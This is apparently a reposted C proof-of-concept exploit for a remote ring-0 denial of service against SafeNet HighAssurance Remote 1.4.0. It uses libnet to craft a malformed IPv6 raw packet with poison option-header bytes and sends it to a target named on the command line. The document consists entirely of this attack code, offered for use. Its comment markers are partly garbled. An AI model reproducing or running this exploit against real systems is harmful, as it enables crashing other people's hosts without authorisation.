include <libnet.h>

int main (int argc, char **argv)
{
u_char *buf = NULL;

/ libnet vars /
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lnsock;
char *device = NULL;

/ packet vars /
struct ip *ip_hdr = NULL;
struct opt *opt_hdr = NULL;
u_int32_t src_ip = 0, dst_ip = 0;

printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POCn"

      "by John Anderson <john@ev6.net>\n"
      "   mu-b <mu-b@digit-labs.org>\n\n");

if (!argv[1])

{
  printf ("Usage: %s <destination> [source]\n", argv[0]);
  exit (EXIT_FAILURE);
}

/ allocate space for packet /
if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL)

{
  perror ("malloc: ");
  exit (EXIT_FAILURE);
}

/ initialise libnet /
lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
if (lnsock == NULL)

{
  fprintf (stderr, "libnet_init() failed: %s", errbuf);
  exit (-1);
}

if (!argv[2])

src_ip = lookup ("127.0.0.1");

else

src_ip = lookup (argv[2]);

dst_ip = lookup (argv[1]);

/ Build the pseudo-IPv4 header /
memset (buf, 0, sizeof buf);
ip_hdr = (struct ip *) buf;
ip_hdr->ip_v = 6;
ip_hdr->ip_hl = 0;
ip_hdr->ip_tos = 0;
ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
ip_hdr->ip_id = htons (0);
ip_hdr->ip_off = htons (0);
ip_hdr->ip_ttl = 0;
ip_hdr->ip_p = 0;
ip_hdr->ip_sum = 0;
ip_hdr->ip_src.s_addr = src_ip;
ip_hdr->ip_dst.s_addr = dst_ip;

/ Build option header with poison bytes /
opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
opt_hdr->nxt_hdr = 0x3C; / != 0x3B /
opt_hdr->opt_len = 0x07; /* length n such that:-

                             *(((u_char *)opt_hdr) + n * 2) != 0x3B &&
                             *(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 &&
                             n * 2 < IPV6_HDR_LEN + UDP_LEN */
                            /* a value of 0x00 will suffice!@$%! */

printf ("Attacking %s", argv[1]);
libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
printf (".n");

return (EXIT_SUCCESS);
}

本文链接地址：https://const.net.cn/580.html